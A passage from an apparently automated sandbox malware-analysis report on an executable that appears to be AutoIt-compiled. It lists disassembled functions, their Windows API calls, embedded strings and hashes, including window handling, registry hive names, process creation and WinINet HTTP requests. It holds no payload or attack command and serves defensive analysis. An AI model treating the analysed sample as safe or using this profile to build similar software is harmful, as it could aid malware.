                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _wcslen$MessageSend$BuffCharUpper
                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                        • API String ID: 1103490817-4258414348
                                        • Opcode ID: cc30cd3706127dcf741ec4509bd0fbf781586bf3b33b3cd08af892f5f4fe6b7d
                                        • Instruction ID: 8f5f588642bc1d52e147218d1eac8f56d5682b4c8b406b6d12d357d8c3fdee75
                                        • Opcode Fuzzy Hash: cc30cd3706127dcf741ec4509bd0fbf781586bf3b33b3cd08af892f5f4fe6b7d
                                        • Instruction Fuzzy Hash: DFE19F352083018FC754EF25C45096AB7E1FF99318F24899DF8A65B3A2DB30EE49DB85
                                        Function 00C7C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _wcslen$BuffCharUpper
                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                        • API String ID: 1256254125-909552448
                                        • Opcode ID: 6ae530524d84d075d41598a1da4ad0675f98b26e2118d5232ec981822d67eb17
                                        • Instruction ID: 4ec48b54fdc509c085fc022b99f3e6b584b69f0690f2a362e7b9f272bebaf27f
                                        • Opcode Fuzzy Hash: 6ae530524d84d075d41598a1da4ad0675f98b26e2118d5232ec981822d67eb17
                                        • Instruction Fuzzy Hash: 4571D87260012B8BCF20DE79C9D15FE3395ABA5764F15852CFC6DA7284E631CE85D3A0
                                        Function 00C8833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT ref: 00C8835A
                                        • _wcslen.LIBCMT ref: 00C8836E
                                        • _wcslen.LIBCMT ref: 00C88391
                                        • _wcslen.LIBCMT ref: 00C883B4
                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00C883F2
                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00C85BF2), ref: 00C8844E
                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C88487
                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00C884CA
                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C88501
                                        • FreeLibrary.KERNEL32(?), ref: 00C8850D
                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C8851D
                                        • DestroyIcon.USER32(?,?,?,?,?,00C85BF2), ref: 00C8852C
                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00C88549
                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00C88555
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                        • String ID: .dll$.exe$.icl
                                        • API String ID: 799131459-1154884017
                                        • Opcode ID: 9570de4d617f2d31ea1b7c80c49e6c118de7b999a9f82eaa94594bd2ae83c984
                                        • Instruction ID: dc8311c97a6d7605b0a9216005fbf1081a9299450177504f35ce0fbb57d1ed39
                                        • Opcode Fuzzy Hash: 9570de4d617f2d31ea1b7c80c49e6c118de7b999a9f82eaa94594bd2ae83c984
                                        • Instruction Fuzzy Hash: 9F61FF72500209BEEB14EF64CC81BFE77A8BF04711F504219F825E64D1DB74AA88DBA4
                                        Function 00BF7778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                        • API String ID: 0-1645009161
                                        • Opcode ID: 1c39f0f1fdac0f55ed04d622003f063ec7189433b9b341b91b1f35d2c566ee2b
                                        • Instruction ID: 53c23219e75e5be036f8843ef298c099d54e324e89db1f62e929e4aa676d4639
                                        • Opcode Fuzzy Hash: 1c39f0f1fdac0f55ed04d622003f063ec7189433b9b341b91b1f35d2c566ee2b
                                        • Instruction Fuzzy Hash: D881C471654209BBDB20BF60CC42FBE77A8EF15340F0440B4FA05AB196EB70DA59E7A5
                                        Function 00C55A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadIconW.USER32(00000063), ref: 00C55A2E
                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00C55A40
                                        • SetWindowTextW.USER32(?,?), ref: 00C55A57
                                        • GetDlgItem.USER32(?,000003EA), ref: 00C55A6C
                                        • SetWindowTextW.USER32(00000000,?), ref: 00C55A72
                                        • GetDlgItem.USER32(?,000003E9), ref: 00C55A82
                                        • SetWindowTextW.USER32(00000000,?), ref: 00C55A88
                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00C55AA9
                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00C55AC3
                                        • GetWindowRect.USER32(?,?), ref: 00C55ACC
                                        • _wcslen.LIBCMT ref: 00C55B33
                                        • SetWindowTextW.USER32(?,?), ref: 00C55B6F
                                        • GetDesktopWindow.USER32 ref: 00C55B75
                                        • GetWindowRect.USER32(00000000), ref: 00C55B7C
                                        • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00C55BD3
                                        • GetClientRect.USER32(?,?), ref: 00C55BE0
                                        • PostMessageW.USER32(?,00000005,00000000,?), ref: 00C55C05
                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00C55C2F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                        • String ID:
                                        • API String ID: 895679908-0
                                        • Opcode ID: b7c569a50f3b2597f2a1a49efe55a67ca90388025f7752935c8f757152805a5c
                                        • Instruction ID: 518953eb3c125918d423cd010867da3bbdd1ecae5d6d3d8659cfafc056993846
                                        • Opcode Fuzzy Hash: b7c569a50f3b2597f2a1a49efe55a67ca90388025f7752935c8f757152805a5c
                                        • Instruction Fuzzy Hash: 3F71A035900B059FCB20DFA8CD99BAEBBF5FF48705F100528E552A25A0D774E944CB54
                                        Function 00C100C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                        Download Yara Rule
                                        APIs
                                        • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00C100C6
                                          • Part of subcall function 00C100ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00CC070C,00000FA0,55DBD47D,?,?,?,?,00C323B3,000000FF), ref: 00C1011C
                                          • Part of subcall function 00C100ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00C323B3,000000FF), ref: 00C10127
                                          • Part of subcall function 00C100ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00C323B3,000000FF), ref: 00C10138
                                          • Part of subcall function 00C100ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00C1014E
                                          • Part of subcall function 00C100ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00C1015C
                                          • Part of subcall function 00C100ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00C1016A
                                          • Part of subcall function 00C100ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00C10195
                                          • Part of subcall function 00C100ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00C101A0
                                        • ___scrt_fastfail.LIBCMT ref: 00C100E7
                                          • Part of subcall function 00C100A3: __onexit.LIBCMT ref: 00C100A9
                                        Strings
                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00C10122
                                        • InitializeConditionVariable, xrefs: 00C10148
                                        • SleepConditionVariableCS, xrefs: 00C10154
                                        • kernel32.dll, xrefs: 00C10133
                                        • WakeAllConditionVariable, xrefs: 00C10162
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                        • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                        • API String ID: 66158676-1714406822
                                        • Opcode ID: 98c55854745d3281cfd06899a6ed5cbf8e975fbc2d05244dd98d068d37dc3a92
                                        • Instruction ID: c21067f8df2686b54a34dc80392e09959991b09be40c5f9927dd8054344e0e60
                                        • Opcode Fuzzy Hash: 98c55854745d3281cfd06899a6ed5cbf8e975fbc2d05244dd98d068d37dc3a92
                                        • Instruction Fuzzy Hash: 6521D732644710BBE7106B64EC8ABAE3394EB06F51F30013EF911E26D1DFB498C09BA4
                                        Function 00C530F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                        • API String ID: 176396367-1603158881
                                        • Opcode ID: 7892502f5ca6a21cbb078b38c5c4bffcd52bacf980b86ceedee8715d337ddc93
                                        • Instruction ID: 432186bf475fc8d2bdf31217d437be6698e41153800615155627ba2eb828d26f
                                        • Opcode Fuzzy Hash: 7892502f5ca6a21cbb078b38c5c4bffcd52bacf980b86ceedee8715d337ddc93
                                        • Instruction Fuzzy Hash: 74E11636A005569BCF189F74C8417EEFBB0BF44791F548129E866A7240DB30AFCD9794
                                        Function 00C644C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                        Download Yara Rule
                                        APIs
                                        • CharLowerBuffW.USER32(00000000,00000000,00C8CC08), ref: 00C64527
                                        • _wcslen.LIBCMT ref: 00C6453B
                                        • _wcslen.LIBCMT ref: 00C64599
                                        • _wcslen.LIBCMT ref: 00C645F4
                                        • _wcslen.LIBCMT ref: 00C6463F
                                        • _wcslen.LIBCMT ref: 00C646A7
                                          • Part of subcall function 00C0F9F2: _wcslen.LIBCMT ref: 00C0F9FD
                                        • GetDriveTypeW.KERNEL32(?,00CB6BF0,00000061), ref: 00C64743
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _wcslen$BuffCharDriveLowerType
                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                        • API String ID: 2055661098-1000479233
                                        • Opcode ID: 00f5d6ddba6c1d63eb7b461467794df4930adc84e882be23607fc6f5e9743a2e
                                        • Instruction ID: c008437aa766fb3db53370e8bbf2349090003d04276045d4f5b9e7b366ad418f
                                        • Opcode Fuzzy Hash: 00f5d6ddba6c1d63eb7b461467794df4930adc84e882be23607fc6f5e9743a2e
                                        • Instruction Fuzzy Hash: 82B1F3716083029FC728DF28C8D0A7EB7E5AFA5760F50491DF5A6C7291DB30DA49CB62
                                        Function 00C7AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT ref: 00C7B198
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C7B1B0
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C7B1D4
                                        • _wcslen.LIBCMT ref: 00C7B200
                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C7B214
                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C7B236
                                        • _wcslen.LIBCMT ref: 00C7B332
                                          • Part of subcall function 00C605A7: GetStdHandle.KERNEL32(000000F6), ref: 00C605C6
                                        • _wcslen.LIBCMT ref: 00C7B34B
                                        • _wcslen.LIBCMT ref: 00C7B366
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C7B3B6
                                        • GetLastError.KERNEL32(00000000), ref: 00C7B407
                                        • CloseHandle.KERNEL32(?), ref: 00C7B439
                                        • CloseHandle.KERNEL32(00000000), ref: 00C7B44A
                                        • CloseHandle.KERNEL32(00000000), ref: 00C7B45C
                                        • CloseHandle.KERNEL32(00000000), ref: 00C7B46E
                                        • CloseHandle.KERNEL32(?), ref: 00C7B4E3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                        • String ID:
                                        • API String ID: 2178637699-0
                                        • Opcode ID: d303e55def657d4b6d3c91c18e44f7f722dea49fcd7e0a1fe9cadfdb407778eb
                                        • Instruction ID: c09022f5398b15383625ce15e2fa28b59889ea8444c3751ebc2478f4bd13aad9
                                        • Opcode Fuzzy Hash: d303e55def657d4b6d3c91c18e44f7f722dea49fcd7e0a1fe9cadfdb407778eb
                                        • Instruction Fuzzy Hash: 06F1AC716083009FC724EF24C891B6FBBE5AF85314F14859DF9A99B2A2CB31ED45CB52
                                        Function 00BF326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetMenuItemCount.USER32(00CC1990), ref: 00C32F8D
                                        • GetMenuItemCount.USER32(00CC1990), ref: 00C3303D
                                        • GetCursorPos.USER32(?), ref: 00C33081
                                        • SetForegroundWindow.USER32(00000000), ref: 00C3308A
                                        • TrackPopupMenuEx.USER32(00CC1990,00000000,?,00000000,00000000,00000000), ref: 00C3309D
                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00C330A9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                        • String ID: 0
                                        • API String ID: 36266755-4108050209
                                        • Opcode ID: 653f91300c19a5d8da2b821bf786e7e4189bc6d5f8eb0fa2c9b0d861a640c1c1
                                        • Instruction ID: 364283385e1ce015308c78a04d6d14a61a69dc3b20f1bbaff10b009061ef41dd
                                        • Opcode Fuzzy Hash: 653f91300c19a5d8da2b821bf786e7e4189bc6d5f8eb0fa2c9b0d861a640c1c1
                                        • Instruction Fuzzy Hash: FC715A30640219BEEF219F64CC89FAEBFA4FF05764F200216F6246A1E1C7B1AE14DB54
                                        Function 00C86CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DestroyWindow.USER32(?,?), ref: 00C86DEB
                                          • Part of subcall function 00BF6B57: _wcslen.LIBCMT ref: 00BF6B6A
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00C86E5F
                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00C86E81
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C86E94
                                        • DestroyWindow.USER32(?), ref: 00C86EB5
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00BF0000,00000000), ref: 00C86EE4
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C86EFD
                                        • GetDesktopWindow.USER32 ref: 00C86F16
                                        • GetWindowRect.USER32(00000000), ref: 00C86F1D
                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C86F35
                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00C86F4D
                                          • Part of subcall function 00C09944: GetWindowLongW.USER32(?,000000EB), ref: 00C09952
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                        • String ID: 0$tooltips_class32
                                        • API String ID: 2429346358-3619404913
                                        • Opcode ID: f664cdebf786342f63fd837a93094a493d56ce004de09e5bf9bf7580560469ad
                                        • Instruction ID: eed1162ae5fdcd15bf152b9ba01379a5d752ec4a4d164c11f7da21ff721a7a76
                                        • Opcode Fuzzy Hash: f664cdebf786342f63fd837a93094a493d56ce004de09e5bf9bf7580560469ad
                                        • Instruction Fuzzy Hash: E3716C74104244AFDB21DF58DC88FBABBE9FB89308F04042DFA9987261D770E905CB19
                                        Function 00C8911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00C09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C09BB2
                                        • DragQueryPoint.SHELL32(?,?), ref: 00C89147
                                          • Part of subcall function 00C87674: ClientToScreen.USER32(?,?), ref: 00C8769A
                                          • Part of subcall function 00C87674: GetWindowRect.USER32(?,?), ref: 00C87710
                                          • Part of subcall function 00C87674: PtInRect.USER32(?,?,00C88B89), ref: 00C87720
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00C891B0
                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00C891BB
                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00C891DE
                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00C89225
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00C8923E
                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00C89255
                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00C89277
                                        • DragFinish.SHELL32(?), ref: 00C8927E
                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00C89371
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                        • API String ID: 221274066-3440237614
                                        • Opcode ID: 803cce442ee30b258e7570c2c812d8c2e1d13682d879a05de5506a90a7c04243
                                        • Instruction ID: b55c429a1909f593c558b36a521cde742a9d30ea99d7961f6903a2a2f42f286e
                                        • Opcode Fuzzy Hash: 803cce442ee30b258e7570c2c812d8c2e1d13682d879a05de5506a90a7c04243
                                        • Instruction Fuzzy Hash: AA617D71108305AFC701EF64DC85EAFBBE8EF89750F040A2DF595931A1DB70AA49CB66
                                        Function 00C6C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C6C4B0
                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00C6C4C3
                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00C6C4D7
                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00C6C4F0
                                        • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00C6C533
                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00C6C549
                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C6C554
                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C6C584
                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00C6C5DC
                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00C6C5F0
                                        • InternetCloseHandle.WININET(00000000), ref: 00C6C5FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                        • String ID:
